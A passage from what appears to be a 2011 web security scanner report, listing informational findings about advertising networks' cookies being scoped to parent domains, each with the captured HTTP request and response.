Set-Cookie: 2=2x5NmZC-t7Z; Domain=.lucidmedia.com; Expires=Tue, 10-Apr-2012 16:31:19 GMT; Path=/
Content-Length: 164
Connection: keep-alive

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3406242120278446565"/>');
5.13. http://ads.adap.tv/beacons  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /beacons

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /beacons?callback=jsonp1302352256751 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="-6740737079467195442__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/plain; charset=iso-8859-1
Server: Jetty(6.1.22)
Content-Length: 579

jsonp1302352256751({
   "beacons":["http://tags.bluekai.com/site/2174", "http://load.exelator.com/load/?p=104&g=080&j=0&u=1234567&site=2222", "http://pixel.quantserve.com/seg/r;a=p-573scDfDoUH6o;redirec
...[SNIP]...
5.14. http://ads.adap.tv/cookie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adap.tv
Path:   /cookie

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cookie?pageUrl=http://www.wptz.com/news/27483035/detail.html&isTop=true&callback=1 HTTP/1.1
Host: ads.adap.tv
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
p3p: CP="DEM"
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: adaptv_unique_user_cookie="724771479354552954__TIME__2011-04-09+05%3A31%3A05";Path=/;Domain=.adap.tv;Expires=Tue, 16-Dec-42 14:17:45 GMT
Content-Type: text/html
Set-Cookie: adaptv_page_url=M3h9qeyoFhilJJ6HSKW-Ih8ErlmQyxh/jTTH/xtpQjCqPVjzIafrKmPMbhDYLFSNHlonA/EwBN8wEKrozBrD-Joz0kZO3Wd8;Path=/;Domain=.adap.tv
Content-Length: 0
Server: Jetty(6.1.22)

5.15. http://ads.adbrite.com/adserver/vdi/682865  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/682865

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/682865?d=null&r=http%3A%2F%2Fuser.lucidmedia.com%2Fclicksense%2Fuser%3Fp%3D88436487f575811a%26r%3D0%26i%3D HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 301 Moved Permanently
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Date: Sat, 09 Apr 2011 12:35:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: http://user.lucidmedia.com/clicksense/user?p=88436487f575811a&r=0&i=MTY4MzYyMDQ2eDAuNzQzIDEzMDE3ODY2MDV4LTExODAzODE1MDI
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052ad@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:57 GMT
Set-Cookie: rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:57 GMT
Content-Length: 0

5.16. http://ads.adbrite.com/adserver/vdi/684339  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/684339

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/684339?d=uuid%3D4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:02 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b2@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:02 GMT
Set-Cookie: rb="0:684339:20838240:uuid=4d97b063-cd55-fcc9-f79b-3dc3c331fd5b:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0";Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:02 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.17. http://ads.adbrite.com/adserver/vdi/712156  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/712156

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/712156?d=1iolb30nur9ak HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; vsd=0@1@4d9d6e04@cti.w55c.net; rb=0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 00:22:01 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Sun, 10-Apr-2011 00:22:01 GMT
Set-Cookie: vsd=0@1@4d9fa6a9@s7.addthis.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 00:22:01 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 00:22:01 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.18. http://ads.adbrite.com/adserver/vdi/742697  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/742697?d=4608069584519221037 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=&mpid=&fpid=-1&rnd=7441790688687410964&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"; rb=0:682865:20838240:null:0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:41:21 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 12-Apr-2011 16:41:21 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D";Path=/;Domain=.adbrite.com;Expires=Thu, 08-Apr-2021 16:41:21 GMT
Set-Cookie: vsd=0@1@4da32f31@cdn.turn.com;Path=/;Domain=.adbrite.com;Expires=Wed, 13-Apr-2011 16:41:21 GMT
Set-Cookie: fq=;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 16:41:21 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.19. http://ads.adbrite.com/adserver/vdi/762701  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/762701

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/762701?d=E3F32BD012B0974D052B68A20247663B HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@3@4da052a5@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:35:50 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@4@4da052a6@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:50 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:762701:20861280:E3F32BD012B0974D052B68A20247663B:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:35:50 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.20. http://ads.adbrite.com/adserver/vdi/779045  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/779045

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/vdi/779045?d=37820808542507095 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@1@4da0529f@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj"

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 09 Apr 2011 12:36:00 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: vsd=0@2@4da052b0@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:36:00 GMT
Set-Cookie: rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:779045:20861280:37820808542507095:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0;Path=/;Domain=.adbrite.com;Expires=Fri, 08-Jul-2011 12:36:00 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;
5.21. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1190962H87920110119151326&cid=1424449&pos=h&redir=http://r.turn.com/r/formclick/id/WtKKC0F1UC834gsABwIBAA/url/$CTURL$&time=6|7:35|-5&r=0.8330807760357857&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 09 Apr 2011 12:36:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Content-type: text/html
Content-length: 8673
Set-Cookie:PRID=337572AE-A012-4FFC-8DD1-6EAB82E26D53; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRbu=EoHuWaH2p;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRvt=CBJBaEoHuWaH2pAIJBBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBF-19!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=7BA00400-6896-A97D-0309-05A002090101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzpE:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|Fy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzpEFy8z:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
5.22. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=E05510 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.foxnews.com/politics/index.html
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; NETSEGS_E05510=379226250c6302c7&E05510&0&4dc81472&0&&4da25a08&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1JU2jPhIc1A0uGehL84pPUbKzTkRplHTtDOLcFLL20Wt/xDozbuB9JMvwkAev2DUhq9kHuGUbrEuN8ON6TNG555znQzlM/5y3Of8x/X6dKg3FnSBBN+UlVxRdchaBGHVUKje4s8VkZQWjQ1gqgAwl+iH3n81oscO5chIWRZ36CXmDSa/OTIUw7CjGsrVH7jcNbZz1+P/5Cwum4IaWC0xqWyJ6XovDln8WaROkuTy33TUAHU61RJV5ivuxthgGJTnsGP2oim8WLMsNpJJA/LXcSgIXz4hNBUU9JAy7BvTu431M47rwgvXF1wwSs8CTVlcKnpNC+IZG/etg7wJ7v5WMpOoewDSPyl+D+ZITHQGpdDrmlVCTSuWtoRAk/fynI6itvIlfPCsB7ygRb9E+JbXqiTTZnEwFnkfcUSLpfgXJjDpEUtIjl0JADwIgGt00osG49t9IyNgiq4ztSgib+W2H7G4irTT7YqeFrKAKXiduq88e4SYI3XCR7PRqRGDSkcK7fP5pU4c4mWtpSGRpuZ/jQr+avXtESVqxm1F2x/dItR5K0ra7JZEPKK5ZdfMXYyC37FPztdunoZPk7PtuCqchU5n4be66l78i37EYOhAfDWUVKTiBXLEGa8OBYj5hoUrVcM75uopbp1ssdiEnTeE0OoyiUytxJOyUR0ZlVeXCl6VK+3+b7NaC+BUqdz1dLv+wtaIRVKaV4LStSk/n; rtc_TdTG=MLsv8yNKcQ5npbJrVs6vNkhIY6HjafGNqOTc1tAMxx8g2PSvwsElcsz7aCnYMEcFNWuyY0i34UZIUNjkLRgI9LkPCbfeH+KZCLxbrVb0tyqLkPb8grbjELIzOkhM53hlyrO5D+rL+JnaL3Hgz4n/P6OIeeLVXqjCnekSd+pnyoVrDjtw9TBr8CCVq4T37CwxL2fr9HC5Xyzve+JV52sLe5TX8Fq441fmYhKVTwiwXgDbgCpHT8aXQ5IlJz8y8fgLe4eNS6Fl53mI7GKBW+UlaUFSBuQbZhtcO3D2OBEnfLRmqWHt0EKaTNhYxr2/rohU9ox3fR+oZzRh5qRrNtPznHi15vGfiD2UUSPtQ2m9GBRVzh3VMLAzWpfHW1PVV8Y3VCYwGDyD8cYBXAEJ3Vd5rOHHwhBgfvfAAmitYuz1Iize51YbT9xVYpZfTNN+C8RpPYOW70eMODRYGng1A6swXECmgJNSt2kT2e0zp8sp4SIIim0M1qMchTiNAj+6qVH3UHnC6UtfizKH6aGCntAnR++9hA==; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc8147b&0&&4d9fd802&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPF5kOBLwIMpzaxu2E2X52BOqEAEKTaYgYB7RmorjQ0sQ/Z0pMs/uNhWv9kDsM6I1OyNKGAI79hIwKvbOAlumXzgyuUaTFaCH+V4aSgqG2GMjvmS59xVuCAf4vueiYFNo9S72YpjYVEQ02rXdEHf5wlv+bSTNA6SWGQkpXPkeVMyYiNWDYjvLUPrW3poFL9bofizkV7I6ynO1TtYsgOwEMnIgbNsHH6nCwM0Kxbt46lR3orMFmVm/ydpkuxt43XF4gHS2Ma7Phd6W8DNhcci4KdRaug+fsZf4pNBQ6pH3QSZ3I3F+yd8CtC1RwwEMpzFrvbntG1S7ZEbg==; udm_0=MLvv9SUJaSpr557EdtIX6fE3HZxD2tVEbZaaSakC1Vtg80jsQpMZ82Rp4QDAVMIXzRVDE7hI/n/4akBaNcbN8GzvGBHbsQslcMTLNlRxc+ltcto7W3xwlydvz273pz0jQ4SVo42FUgVfwsuTJ73/ozLa5Dj4ttdtyx4ODj0c4MRgpOcHtrA9skVdsBvJxX6IA4P/mp6sWRYt1VtUyG21pdiMr6BE2SYIYkowggle26SPHtS97hgJom9QzF+fjkdopqa/eDqJ/hP21kuB7Nj/+t5E3SpclXlyj6NaRvJGIN17eN/umzN7wv+ezazt/lwqAWGvQUyaAiuB1TVylFtLbj7I0PdOEqjxsJKcOCJZ1JhXbmC1lZ6XChDbdUhU3t+YYwB//wiNi9Ld8batKsDYTWX0W6bmAEzQjeSWzUvtoONJgOSrqzLxsH3hcVyBsoM91FthCvWkrc0GDBVSVKzEww/Vo2msH1uIHBaQx3n9e13MpFHEYrkFOPjgbLG/rl8utHLnLWo971UO7HAZDcHPxOWByvPVoV7NG0dP25vYms68CezhpoXTWHnnVCE59stFSuvSrfAPWQ6FZGAe7Bjr9EcnT0FFDQQyTszjrf5QQlvbKIwEExhQMo10SGqH8E7rgEMNFS1sTmfkix3bXcdRC/4c17mQuMHwkssVmYY+3jS/LSNovgvkDf4Yy52ORyslLJ2KwcdH1HMx2WtoUSVh9tsdinADifa6eZOcI+g0oFmLUlkFggXnwMlg